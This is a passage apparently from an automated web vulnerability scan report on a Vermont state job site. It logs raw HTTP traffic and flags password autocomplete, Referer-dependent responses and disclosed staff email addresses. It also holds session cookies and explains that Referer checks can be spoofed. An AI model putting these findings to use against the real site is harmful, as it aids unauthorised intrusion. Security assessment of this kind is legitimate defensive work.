HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:57 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:11:55'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:33 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:07:33'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:03'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 301 Moved Permanently Content-Length: 158 Content-Type: text/html Location: https://www.vermontjoblink.com/ada/ Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:15:04 GMT Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://www.vermontjoblink.com/ada/">here</a></body>
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email addresses were disclosed in the response:
joseph.lucia@state.vt.us
vjl@state.vt.us
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="mailto:vjl@state.vt.us">vjl@state.vt.us</a> ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:06:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
